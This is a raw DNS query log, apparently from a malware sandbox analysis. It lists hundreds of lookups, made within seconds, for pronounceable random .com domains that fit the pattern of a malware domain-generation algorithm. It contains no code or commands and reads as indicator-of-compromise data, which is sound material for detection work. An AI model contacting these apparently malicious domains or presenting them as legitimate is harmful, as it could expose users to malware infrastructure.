                                                                                                                                                                                                            Nov 11, 2024 18:25:17.131062031 CET192.168.2.101.1.1.10x4ce1Standard query (0)qeqyreq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.139609098 CET192.168.2.101.1.1.10x1e26Standard query (0)qekynuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.139802933 CET192.168.2.101.1.1.10x6a4cStandard query (0)lymywaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.139982939 CET192.168.2.101.1.1.10x6dfdStandard query (0)lykyfen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.140218973 CET192.168.2.101.1.1.10x28b4Standard query (0)pumylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.140619040 CET192.168.2.101.1.1.10xe134Standard query (0)puzyguv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.140808105 CET192.168.2.101.1.1.10xae2Standard query (0)lysyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.145772934 CET192.168.2.101.1.1.10x1444Standard query (0)vopypif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.146028996 CET192.168.2.101.1.1.10x73f4Standard query (0)pujybyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.878958941 CET192.168.2.101.1.1.10xee68Standard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.881028891 CET192.168.2.101.1.1.10xe246Standard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.881285906 CET192.168.2.101.1.1.10xe7e4Standard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.907041073 CET192.168.2.101.1.1.10xc399Standard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.907430887 CET192.168.2.101.1.1.10x3da9Standard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.908323050 CET192.168.2.101.1.1.10x8556Standard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.908945084 CET192.168.2.101.1.1.10xaed1Standard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.909178972 CET192.168.2.101.1.1.10x3a50Standard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.909359932 CET192.168.2.101.1.1.10xfef7Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.909555912 CET192.168.2.101.1.1.10x4b81Standard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.909740925 CET192.168.2.101.1.1.10x4195Standard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.910634041 CET192.168.2.101.1.1.10xdfecStandard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.910695076 CET192.168.2.101.1.1.10xca98Standard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.910861969 CET192.168.2.101.1.1.10xe9e9Standard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911036968 CET192.168.2.101.1.1.10x4272Standard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911215067 CET192.168.2.101.1.1.10xb627Standard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911236048 CET192.168.2.101.1.1.10x8459Standard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911422014 CET192.168.2.101.1.1.10x1726Standard query (0)gaqyhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911602020 CET192.168.2.101.1.1.10x73e7Standard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911675930 CET192.168.2.101.1.1.10xe8bcStandard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911783934 CET192.168.2.101.1.1.10x66c8Standard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911947966 CET192.168.2.101.1.1.10xd03aStandard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.912220955 CET192.168.2.101.1.1.10x9bbcStandard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.915432930 CET192.168.2.101.1.1.10x7303Standard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.915646076 CET192.168.2.101.1.1.10xcd11Standard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.916420937 CET192.168.2.101.1.1.10x3a98Standard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.916616917 CET192.168.2.101.1.1.10x1c9cStandard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.917372942 CET192.168.2.101.1.1.10x8e4aStandard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.917570114 CET192.168.2.101.1.1.10x9627Standard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.131535053 CET192.168.2.101.1.1.10x3903Standard query (0)qeqyvig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.131964922 CET192.168.2.101.1.1.10xdd90Standard query (0)puzytap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.132216930 CET192.168.2.101.1.1.10xb143Standard query (0)volyrac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.132733107 CET192.168.2.101.1.1.10xd9bStandard query (0)gadyhyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.141839027 CET192.168.2.101.1.1.10x37fdStandard query (0)qedyhyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.143997908 CET192.168.2.101.1.1.10x6848Standard query (0)pumycug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.150962114 CET192.168.2.101.1.1.10x4ab2Standard query (0)lykywid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.158103943 CET192.168.2.101.1.1.10x5fa6Standard query (0)galyros.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.158400059 CET192.168.2.101.1.1.10xca90Standard query (0)vonycum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.159774065 CET192.168.2.101.1.1.10xf0ceStandard query (0)lysyger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.160458088 CET192.168.2.101.1.1.10x9267Standard query (0)qebyxyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.161046028 CET192.168.2.101.1.1.10xa41cStandard query (0)gaqyvob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.161264896 CET192.168.2.101.1.1.10x89bbStandard query (0)pupygel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.161999941 CET192.168.2.101.1.1.10xac84Standard query (0)vopygat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.162333012 CET192.168.2.101.1.1.10x36fStandard query (0)gacypyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.162591934 CET192.168.2.101.1.1.10x46baStandard query (0)purybav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.170877934 CET192.168.2.101.1.1.10xfe42Standard query (0)pujylog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.173274040 CET192.168.2.101.1.1.10x408aStandard query (0)pumydoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.174484015 CET192.168.2.101.1.1.10x3b5aStandard query (0)qedyqup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.191293001 CET192.168.2.101.1.1.10xdf9aStandard query (0)vocypyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.191771984 CET192.168.2.101.1.1.10xd5dStandard query (0)lyrynad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.192490101 CET192.168.2.101.1.1.10xf6fbStandard query (0)gahykih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.192672968 CET192.168.2.101.1.1.10x699eStandard query (0)qetynev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.192751884 CET192.168.2.101.1.1.10xb28dStandard query (0)vofyjuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.192900896 CET192.168.2.101.1.1.10x3551Standard query (0)puvypul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.193854094 CET192.168.2.101.1.1.10x245dStandard query (0)vojykom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.198229074 CET192.168.2.101.1.1.10x72d3Standard query (0)qekyrov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.198637009 CET192.168.2.101.1.1.10x144Standard query (0)purygeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.199286938 CET192.168.2.101.1.1.10x358dStandard query (0)pufyjuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.199486971 CET192.168.2.101.1.1.10xc628Standard query (0)ganycuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.199780941 CET192.168.2.101.1.1.10x1653Standard query (0)lygyjuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.200102091 CET192.168.2.101.1.1.10x2909Standard query (0)lyxytex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.200438023 CET192.168.2.101.1.1.10x46e0Standard query (0)gaqyfah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.200506926 CET192.168.2.101.1.1.10xc8caStandard query (0)qeqyfaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.200670958 CET192.168.2.101.1.1.10x57f8Standard query (0)gahyraw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.200874090 CET192.168.2.101.1.1.10xbc31Standard query (0)lyrygyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.200922966 CET192.168.2.101.1.1.10xf246Standard query (0)volyzef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.201103926 CET192.168.2.101.1.1.10x721aStandard query (0)lygywor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.201282024 CET192.168.2.101.1.1.10x22d9Standard query (0)vofyqit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.212007999 CET192.168.2.101.1.1.10x62a6Standard query (0)lyxyxyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.212697983 CET192.168.2.101.1.1.10x633bStandard query (0)lykylan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.215008974 CET192.168.2.101.1.1.10x4e26Standard query (0)galyzeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.215502024 CET192.168.2.101.1.1.10x2363Standard query (0)qegyrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.215667963 CET192.168.2.101.1.1.10x8f34Standard query (0)puzyxyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.215884924 CET192.168.2.101.1.1.10xc17bStandard query (0)pufywil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.216048002 CET192.168.2.101.1.1.10x687fStandard query (0)gacycus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.216058969 CET192.168.2.101.1.1.10x41feStandard query (0)lyvysur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.216253042 CET192.168.2.101.1.1.10x64d5Standard query (0)qebysul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.216519117 CET192.168.2.101.1.1.10x6c06Standard query (0)gadyquz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.216705084 CET192.168.2.101.1.1.10xfc20Standard query (0)lymyfoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.216994047 CET192.168.2.101.1.1.10xe10cStandard query (0)vowygem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.217478037 CET192.168.2.101.1.1.10x2c12Standard query (0)vonydik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.220544100 CET192.168.2.101.1.1.10x27f1Standard query (0)lysymux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.220839977 CET192.168.2.101.1.1.10x3fceStandard query (0)lymyvin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.222512960 CET192.168.2.101.1.1.10x750eStandard query (0)ganydiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.224045992 CET192.168.2.101.1.1.10xf739Standard query (0)pupymyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.517062902 CET192.168.2.101.1.1.10xf09eStandard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.517693996 CET192.168.2.101.1.1.10xa348Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.517709970 CET192.168.2.101.1.1.10xcd84Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.517926931 CET192.168.2.101.1.1.10xe42fStandard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.518038034 CET192.168.2.101.1.1.10xc729Standard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.518160105 CET192.168.2.101.1.1.10xecbStandard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.518238068 CET192.168.2.101.1.1.10x50daStandard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.519254923 CET192.168.2.101.1.1.10x5ed8Standard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.531105995 CET192.168.2.101.1.1.10xeedcStandard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.531347990 CET192.168.2.101.1.1.10xc1cbStandard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.532445908 CET192.168.2.101.1.1.10x907aStandard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.532562017 CET192.168.2.101.1.1.10xdf37Standard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.532675982 CET192.168.2.101.1.1.10xebaeStandard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.532799006 CET192.168.2.101.1.1.10xc76Standard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.532850981 CET192.168.2.101.1.1.10x2de2Standard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.533006907 CET192.168.2.101.1.1.10x59b3Standard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.533174992 CET192.168.2.101.1.1.10xba4eStandard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.533293962 CET192.168.2.101.1.1.10x685eStandard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.533348083 CET192.168.2.101.1.1.10xd579Standard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.533458948 CET192.168.2.101.1.1.10x4d9aStandard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.534693956 CET192.168.2.101.1.1.10x2a70Standard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.535697937 CET192.168.2.101.1.1.10x9133Standard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.540571928 CET192.168.2.101.1.1.10xa0fdStandard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.119779110 CET192.168.2.101.1.1.10xd73Standard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.122039080 CET192.168.2.101.1.1.10xd332Standard query (0)pumyliq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.124202967 CET192.168.2.101.1.1.10xc516Standard query (0)puvyjyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.154591084 CET192.168.2.101.1.1.10x2761Standard query (0)qetytav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.159193039 CET192.168.2.101.1.1.10xa4fdStandard query (0)lysysyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.250781059 CET192.168.2.101.1.1.10xd295Standard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.303813934 CET192.168.2.101.1.1.10x94a2Standard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.306467056 CET192.168.2.101.1.1.10x163dStandard query (0)vopypec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.308676958 CET192.168.2.101.1.1.10x4f4cStandard query (0)pupypep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.311779022 CET192.168.2.101.1.1.10x19d1Standard query (0)pufypeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.314517975 CET192.168.2.101.1.1.10x46aStandard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.376499891 CET192.168.2.101.1.1.10xa640Standard query (0)qebykul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.380016088 CET192.168.2.101.1.1.10x991aStandard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.458386898 CET192.168.2.101.1.1.10x56fdStandard query (0)qekynog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.458626986 CET192.168.2.101.1.1.10x3d46Standard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.458842993 CET192.168.2.101.1.1.10xdc7fStandard query (0)gaqykus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.458975077 CET192.168.2.101.1.1.10xafeeStandard query (0)lykynon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.463718891 CET192.168.2.101.1.1.10x7bcdStandard query (0)ganykuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.465225935 CET192.168.2.101.1.1.10xbafaStandard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.466487885 CET192.168.2.101.1.1.10x40b7Standard query (0)gahyvuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.470082045 CET192.168.2.101.1.1.10x593eStandard query (0)vonykuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.513220072 CET192.168.2.101.1.1.10xaceeStandard query (0)gahydyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.569473982 CET192.168.2.101.1.1.10xc4a1Standard query (0)qetylip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.569658995 CET192.168.2.101.1.1.10xe5b1Standard query (0)lyvymej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.571032047 CET192.168.2.101.1.1.10xc77eStandard query (0)lygysen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.571100950 CET192.168.2.101.1.1.10xe817Standard query (0)gaqyrib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.571444988 CET192.168.2.101.1.1.10xa2e2Standard query (0)lykyfud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.571738958 CET192.168.2.101.1.1.10xc950Standard query (0)qekyfiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.572907925 CET192.168.2.101.1.1.10x6c2fStandard query (0)vopyzot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.573168993 CET192.168.2.101.1.1.10xbbd7Standard query (0)ganyqyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.573529959 CET192.168.2.101.1.1.10x9f21Standard query (0)gacynow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.575980902 CET192.168.2.101.1.1.10x8912Standard query (0)qexynol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.577809095 CET192.168.2.101.1.1.10xb233Standard query (0)vowyrif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.578973055 CET192.168.2.101.1.1.10x1ddfStandard query (0)gatyzoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.580857992 CET192.168.2.101.1.1.10x3097Standard query (0)pumywug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.583190918 CET192.168.2.101.1.1.10x7264Standard query (0)vofycyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.583472967 CET192.168.2.101.1.1.10xbf47Standard query (0)galyfis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.603452921 CET192.168.2.101.1.1.10x948Standard query (0)vonyqym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.603766918 CET192.168.2.101.1.1.10x316aStandard query (0)gadycew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.604196072 CET192.168.2.101.1.1.10x94e7Standard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.604386091 CET192.168.2.101.1.1.10x9e51Standard query (0)purytov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.604777098 CET192.168.2.101.1.1.10x1934Standard query (0)qegyvuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.605104923 CET192.168.2.101.1.1.10x7bb3Standard query (0)volygoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.606106997 CET192.168.2.101.1.1.10x7f15Standard query (0)lysyxar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.607322931 CET192.168.2.101.1.1.10x1ac4Standard query (0)puzygop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.607487917 CET192.168.2.101.1.1.10x42a8Standard query (0)pujyduv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.607716084 CET192.168.2.101.1.1.10x6decStandard query (0)vojyduf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.607851982 CET192.168.2.101.1.1.10x132aStandard query (0)qebyqeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.608167887 CET192.168.2.101.1.1.10x1eb5Standard query (0)lygyvuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.608714104 CET192.168.2.101.1.1.10x4652Standard query (0)lyrytod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.609106064 CET192.168.2.101.1.1.10x35bcStandard query (0)qexyhap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.620467901 CET192.168.2.101.1.1.10xb197Standard query (0)qedyxel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.620801926 CET192.168.2.101.1.1.10x643bStandard query (0)qeqyrug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.620899916 CET192.168.2.101.1.1.10xf500Standard query (0)puvymaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.639575958 CET192.168.2.101.1.1.10xbdf3Standard query (0)lymywun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.639797926 CET192.168.2.101.1.1.10x805aStandard query (0)pufycyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.639960051 CET192.168.2.101.1.1.10xa22fStandard query (0)lyxygax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.641233921 CET192.168.2.101.1.1.10xfa27Standard query (0)vocyjet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.642016888 CET192.168.2.101.1.1.10xb9d7Standard query (0)lyrylix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.642220974 CET192.168.2.101.1.1.10x2b0dStandard query (0)pupyxal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.642301083 CET192.168.2.101.1.1.10x10e7Standard query (0)vocymak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.642384052 CET192.168.2.101.1.1.10x4a84Standard query (0)purylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.951076984 CET192.168.2.101.1.1.10xc7a5Standard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.951226950 CET192.168.2.101.1.1.10x4c11Standard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.951386929 CET192.168.2.101.1.1.10x3293Standard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.951546907 CET192.168.2.101.1.1.10xeadeStandard query (0)pupyjap.comA (IP address)IN (0x0001)false
